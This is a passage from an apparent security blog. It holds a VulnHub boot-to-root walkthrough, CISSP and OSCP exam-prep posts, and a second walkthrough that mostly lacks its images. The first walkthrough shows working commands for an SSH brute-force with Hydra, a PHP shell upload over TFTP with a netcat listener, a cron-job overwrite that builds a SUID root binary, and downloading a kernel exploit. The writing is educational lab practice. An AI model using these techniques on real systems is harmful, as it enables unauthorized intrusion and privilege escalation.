    JKanode:x:1013:1013::/home/JKanode:/bin/bash
    CJoo:x:1014:1014::/home/CJoo:/bin/bash
    Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
    LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
    JLipps:x:1017:1017::/home/JLipps:/bin/sh
    jamie:x:1018:1018::/home/jamie:/bin/sh
    Sam:x:1019:1019::/home/Sam:/bin/zsh
    Drew:x:1020:1020::/home/Drew:/bin/bash
    jess:x:1021:1021::/home/jess:/bin/bash
    SHAY:x:1022:1022::/home/SHAY:/bin/bash
    Taylor:x:1023:1023::/home/Taylor:/bin/sh
    mel:x:1024:1024::/home/mel:/bin/bash
    kai:x:1025:1025::/home/kai:/bin/sh
    zoe:x:1026:1026::/home/zoe:/bin/bash
    NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
    www:x:1028:1028::/home/www:
    postfix:x:112:118::/var/spool/postfix:/bin/false
    ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
    elly:x:1029:1029::/home/elly:/bin/bash
    
    awk -F':' '{ print $1}' passwd > users.txt
    root@kali:~/Downloads# hydra -L users.txt -e nsr 192.168.56.102 ssh
    Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
    Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-29 16:44:16
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
    [DATA] attacking service ssh on port 22
    [22][ssh] host: 192.168.56.102   login: SHayslett   password: SHayslett
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-29 16:45:13
    

    Local Privilege 3: TFTP

    I am able to target TFTP and, without authentication, upload the shell directly to the web server on port 80.
    root@kali:/var/www# tftp 192.168.56.102
    tftp> ls     
    ?Invalid command
    tftp> verbose
    Verbose mode on.
    tftp> put shell.php
    putting shell.php to 192.168.56.102:shell.php [netascii]
    Sent 3605 bytes in 0.0 seconds [inf bits/sec]
    tftp>
    

    I set up a listener and, once the shell spawns, I get a TTY using python.
    root@kali:~/Downloads# nc -nlvp 443
    listening on [any] 443 ...
    connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49622
    Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
     18:05:58 up  4:15,  1 user,  load average: 0.00, 0.01, 0.05
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    JKanode  pts/2    192.168.56.101   16:04    1:36m  0.08s  0.11s sshd: JKanode [priv]
    uid=1028(www) gid=1028(www) groups=1028(www)
    /bin/sh: 0: can't access tty; job control turned off
    $ python -c 'import pty;pty.spawn("/bin/bash")'
    www@red:/$ 
    

    Privilege Escalation

    Privilege Escalation 1: Bash History

    Using bash, I was able to script print all the bash histories. I found that a user's history contains a username and password for two users.
    www-data@red:/home$ find -name ".bash_history" -exec cat {} \;
        find -name ".bash_history" -exec cat {} \;
        ...
        id
        cat: ./peter/.bash_history: Permission denied
        find: './peter/.cache': Permission denied
        exit
        id
        whoami
        ls -lah
        pwd
        ps aux
        sshpass -p thisimypassword ssh JKanode@localhost
        apt-get install sshpass
        sshpass -p JZQuyIN5 peter@localhost
        ...
    

    I then learn that Peter has root privilege in the sudoers file. From this, I am able to change the shell to /bin/bash (because I don't like zsh) and print our flag.txt
    ssh peter@192.168.56.102
    red% sudo -l
    
        We trust you have received the usual lecture from the local System
        Administrator. It usually boils down to these three things:
    
            #1) Respect the privacy of others.
            #2) Think before you type.
            #3) With great power comes great responsibility.
    
    [sudo] password for peter: 
        Matching Defaults entries for peter on red:
            lecture=always, env_reset, mail_badpass,
              secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
        User peter may run the following commands on red:
            (ALL : ALL) ALL
    red% sudo usermod -s /bin/bash peter
    peter@red:~$ sudo -i
        ➜  ~ cd /root
        ➜  ~ ls
        fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
        ➜  ~ cat flag.txt 
        ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                                  .-'''''-.
                                  |'-----'|
                                  |-.....-|
                                  |       |
                                  |       |
                 _,._             |       |
            __.o`   o`"-.         |       |
         .-O o `"-.o   O )_,._    |       |
        ( o   O  o )--.-"`O   o"-.`'-----'`
         '--------'  (   o  O    o)  
                      `----------`
    

    Privilege Escalation 2: SUID

    Once I have a local shell, I can search for potential vulnerabilities using the Linux Priv Checker. This can be found at: http://www.securitysift.com/download/linuxprivchecker.py. Using this script, I am able to find a world writable cron job.
    python linuxprivchecker.py > linuxpriv.txt
    less linuxpriv.txt
    
    [+] World Writable Files
        -rw-rw-rw- 1 mysql mysql 39 Aug 29 15:24 /var/www/https/blogblog/wp-content/uploads/shell.php
        -rwxrwxrwx 1 www www 0 Jun  3 14:48 /etc/authbind/byport/80
        -rwxrwxrwx 1 root root 51 Jun  3 20:41 /usr/local/sbin/cron-logrotate.sh
    
    JKanode@red:/tmp$ cat /usr/local/sbin/cron-logrotate.sh 
    #Simon, you really need to-do something about this
    

    I am then able to change the world writable cron to my own suid setter file that I will make. I then create and compile that suid program. Once the cron is run, I will have a nice file to execute to get root.
    JKanode@red:/tmp$ echo -e 'chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;' > /usr/local/sbin/cron-logrotate.sh 
    JKanode@red:/tmp$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
    JKanode@red:/tmp$ gcc setuid.c -o setuid
    setuid.c: In function ‘main’:
    setuid.c:8:2: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
      system("/bin/bash");
    
    JKanode@red:/tmp$ ./setuid
    root@red:/tmp# cat /root/flag.txt 
    ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                              .-'''''-.
                              |'-----'|
                              |-.....-|
                              |       |
                              |       |
             _,._             |       |
        __.o`   o`"-.         |       |
     .-O o `"-.o   O )_,._    |       |
    ( o   O  o )--.-"`O   o"-.`'-----'`
     '--------'  (   o  O    o)  
                  `----------`
    b6b545dc11b7a270f4bad23432190c75162c4a2b
    

    Privilege Escalation 3: Kernel Exploit

    First, I get the kernel version information.
    JKanode@red: uname -a
    Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
    

    Next, I find online the Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) at https://www.exploit-db.com/exploits/39772/. I download the exploit, untar the file, compile, and execute the exploit.
    wget https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
    tar -xvf exploit.tar
    cd ebpf_mapfd_doubleput_exploit
    ./compile.sh
    ./doubleput
    
    root@red:/tmp/ebpf_mapfd_doubleput_exploit# cat /root/flag.txt 
    ~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                              .-'''''-.
                              |'-----'|
                              |-.....-|
                              |       |
                              |       |
             _,._             |       |
        __.o`   o`"-.         |       |
     .-O o `"-.o   O )_,._    |       |
    ( o   O  o )--.-"`O   o"-.`'-----'`
     '--------'  (   o  O    o)  
                  `----------`
    b6b545dc11b7a270f4bad23432190c75162c4a2b
    

    I hope this helps everyone to crack this awesome VM.
    Thanks to g0tmilk for creating the VM. But most of all for hosting vulnhub.com so we have awesome VM's to practice on.

    Saturday, January 30, 2016

    Conquering the CISSP

    Background
    After about four months of studying on and off, I passed the CISSP certification exam. This test contains content that is one-inch deep and a mile wide. You are given six hours to complete an extremely long 250-question exam. Although the test is long and questions are wordy, it is very fair with only a few tricky questions.

    Study Materials
    The most important resource I used was the Cybrary.it videos and best of all it’s FREE. Kelly Handerhan KNOWS her stuff. She will cover all the content areas with the correct depth of information. Also, she will help you to know all the most important areas to focus on to pass the exam.

    The next few of resources I used were: the All-in-one CISSP Study Guide by Shon Harris, CISSP Practice Exams- Shon Harris, and McGraw-Hill Practice Tests. For your information, Shon Harris wrote all of these resources. The all-in-one book goes into a HUGE amount of unnecessary depth on all the topics. I read it cover-to-cover and took all the tests. However, you might be able get away with focusing on all the definitions. As for all of practice tests, they were all more technical but just as wordy as the actual exam.  Using these test questions, I was able to practice deciphering wordy questions and my testing strategy given in the TIPS section of this blog post.

    Lastly, I used 11th hour CISSP study Guide - Eric Conrad for my final review. This book does a great job describing the application of concepts. However, I would not recommend only using this book because the depth may be too shallow to be successful on the exam. It really helps with tying together things you already know.

    Exam
    The test took me a little over 4 of the 6 hours. One of the most important things I learned in my study was that not all domain areas are created equal. If I had to rank the groups by prevalence it would be:
    1. Information Security & Risk
    2. Business Continuity
    2. Access Control
    4. Telecommunications
    4. Software Dev
    6. Crypto
    7. Security Architecture
    8. Legal
    9. Physical
    10. Operations
    Note: There are significantly more of the top 5 domains than the remaining ones.

    Tips
    • Set a test date at a reasonable distance away and work to that date. Without the exam cost hanging over your head, it is likely you won’t ever feel “ready”.
    • Focus on the high level topics and their application like a manager would. Do not focus in the nitty-gritty technical things or in-depth standard memorization. In this exam, you are there to point out problems and not to fix them.
    • Nine times out of ten if answer has more bureaucracy, it will be the correct one.
    • Don't get psyched out if questions are hard or weird. Those may just be beta questions that won't count against your score.
    • Due to the wordiness of the questions, it is better to eliminate incorrect answers than to find the correct one. In most questions, you can eliminate two incorrect answers, giving you now a 50/50 chance. Statistically, if you change 1000 possible answers to 500 in 250 questions, even if you guess, you will be guessing close to 75%. This tool totally worked for me!
    • TAKE CARE OF YOUR BODY! It will be much more important to get a good night’s sleep the night before, than to cram more information into your head. This is a LONG test that if you need to have endurance to pass. Make sure you are well-fed with light nutritious meals so you won’t be sleepy.

    Hope all of these hints and tips help. Good Luck!

    Thursday, September 24, 2015

    I Tried Harder - OSCP Edition

    Background
    After about two and half months of dedicating the majority of my time to the certification, I successfully became an OSCP. I have read many different blogs that gave great advice but I thought I would add my spin on it as well.

    This certification is very time intensive. However, I feel it is the most worth-while certification for an entry level Penetration Tester, and will give you some credibility within the community. Throughout the certification, your primary focus will be exploiting and escalating privilege on vulnerable hosts.

    Preparation
    In preparation, I spent some time working on some vulnerable hosts on Vulnhub. In this site, people develop vulnerable machines very much like the ones you will see on the OSCP. You download and host the vulnerable machine on your computer and attack it.  This is great practice for those who are unsure if the OSCP is for them.

    My favorites I have completed are:
    Lord of the Root <- I created this one. My solution is here.
    Troll 1 and 2

    If you can complete these, even with a little help of the walkthroughs, you should be at the right skill level for the OSCP.

    Also, I developed a script much like Mike at Security Sift to help automate the enumeration process. Since I have a developer background, this was relatively easy and painless. It was really time effective to have my enumeration process be completely automated. However, this is not essential.

    Course
    I recommend going through all the exercises. If you do not, you may not have all the tools you need for the job. Also, it will teach you buffer-overflows in great detail. It wouldn't hurt to review this multiple times. I did. Also, pay close attention to the enumeration section. This is the majority of what you will be doing for the rest of the certification.  You will also need to be prepared to take copious amounts of notes in both the lab and exam environment regarding your path of exploitation and privilege escalation. This will help you greatly with the writeup!

    In the lab environment, enumeration is the key! Many machines will be much easier if have all of the information available. Also, some machines have dependencies on other network machines. If there doesn't seem to be a point of entry and you have enumerated well, the data you need is probably on another machine. Move on and try again later.

    I compromised almost all of the public network with a couple of machines in each of the other networks. I would recommend compromising most, if not all, of the public network before taking your exam. Also, the Admins in the IRC are a great resource for helping push you in the right direction on the lab machines. 

    Exam
    The exam is really where the rubber meets the road. In preparation for the exam, I wrote up my entire lab writeup. This included the exercises, labs, executive summery, remediations, conclusion, and any other piece necessary. I created a template for each machine to fill in once I had completed the exam. I did this because the last thing I wanted to do is spend all of the next 24 hours writing a long report after I had exhausted myself cracking machines for most of the night. Using my template, I was able to reduce my lab writeup time to two hours to complete the exam writeup.

    I was told that if your exam is on the threshold of passing, reporting on your Lab machines and exercises will greatly improve your likelihood of passing the OSCP. Begin working on your reporting early and be thorough. I don't want to get too specific about the exam but what I can say, is that if you have worked hard on the lab environment, it shouldn't be anything that well beyond your understanding.

    After reflecting on my exam, I learned I should have taken care of my body better. Get as much sleep as you can the day before, and as much as you may want to work until the exam is completed, DON'T.  Getting some sleep and looking at it fresh will help you not to spin your wheels. I spent too much time spinning my wheels in stubbornness. 

    Recap
    1. Enumerate, Enumerate, Enumerate
    2. Take detailed notes in exercises, labs, and the exam. It will make report writing exponentially faster.
    3. Write most of your final report BEFORE the exam.
    4. Take care of your body during the test.

    I hope this all helps! Good luck and remember to "Try Harder!"

    Tuesday, September 22, 2015

    Hacking Lord Of the Root


    Background
    I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP. This is a walkthrough to guide those who get stuck to complete the challenge. This is a boot-to-root machine and will not require any guest interaction.

    Note: There is one local privilege entry and there are two different root privilege escalations.

    The OVA can be found at: Vulnhub.

    Exploitation
    Upon booting up the machine I did an entire TCP scan of the host and only ssh is open.

    Upon banner grabbing we see:


    Knock Friend? 1,2,3? That seems like port knocking to me..



    Another full nmap scan reveals a web server has opened!

    Webapp
    After an examination of the webapp with Nikto and Dirb there is nothing of interest. But I was able to find some things through manual testing and examination.

    Index.html
    But there is a comment on the 404 page...
    The comment seems to be base64 so we decode that:
     This URL takes us to a php login page that is vulnerable to SQL injection!

     So we dump the data with sqlmap:

    The root Mysql password was also weak:

    We checked for password reuse on ssh:
    We are in low privilege!

    There are two privilege escalations and both are described.

    Escalation A Buffer overflow:

    We found a suid buffer overflow contained within /SECRET directory. There are three files but when you look at the size of all of them, one is smaller than the other two. This smaller one is the BufferOverflow.
    We moved an exploit dev file into temp so we didn't have to deal with the switching and verified the crash.
    Next, we download GDB Peda. This gdb extension is the absolute best for exploit dev!

    Verified the crash on Peda using out exploit code. Notice we have overwritten EIP with 0x41414141. the Ascii characters "AAAA".

    We also check for security precautions. But there are none.
    HOWEVER, ASLR is on.
    Using GDB Peda, we find our EIP offset.


    Next, we verify control the EIP register. Notice the crash is on 0x42424242. Which is "BBBB"

    We generate our shellcode using Peda and add our shellcode to the exploit.







    Now that we know we have ASLR to circumvent, we need to modify our exploit code.

    Due to ASLR randomizing address space and there are no good jmp esp instructions to use, we do not have a pre-defined location in memory to go to. This means we need to bruteforce the solution. I ran the program in gdb a handful of times to get a feeling of where the stack was landing on execution, due to it being different every time.  I was noticing that it always started with BF and the last 6 bytes were different. So I chose CC because it was in the middle of my random sample of stack locations. The last 4 digits I used were arbitrary. Next we will make a GIANT NOP sled. I used 20480 but it could be potentially larger.

    Lastly, I created code to find the smallest buffer overflow file size to run just in case the file tries to switch mid run and we put that code in a while loop to run it indefinitely. This is because if we get a seg fault, it will replay the request and if we land our shell code it will stop on the shell giving us shell access.

    This was our final code:












    Note: You will notice back-off in the os call. This is expected because os.system is a blocking call. You can try to make it non-blocking to improve the script. But I used os.system for a quick and dirty solution.




    Success!

    Escalation B MYSQL:

    Since we have the MySQL Root password and Mysql is running as root, we can use UDF's to escalate.
    Success! We are in!

    I hope you enjoyed the Lord Of The Root!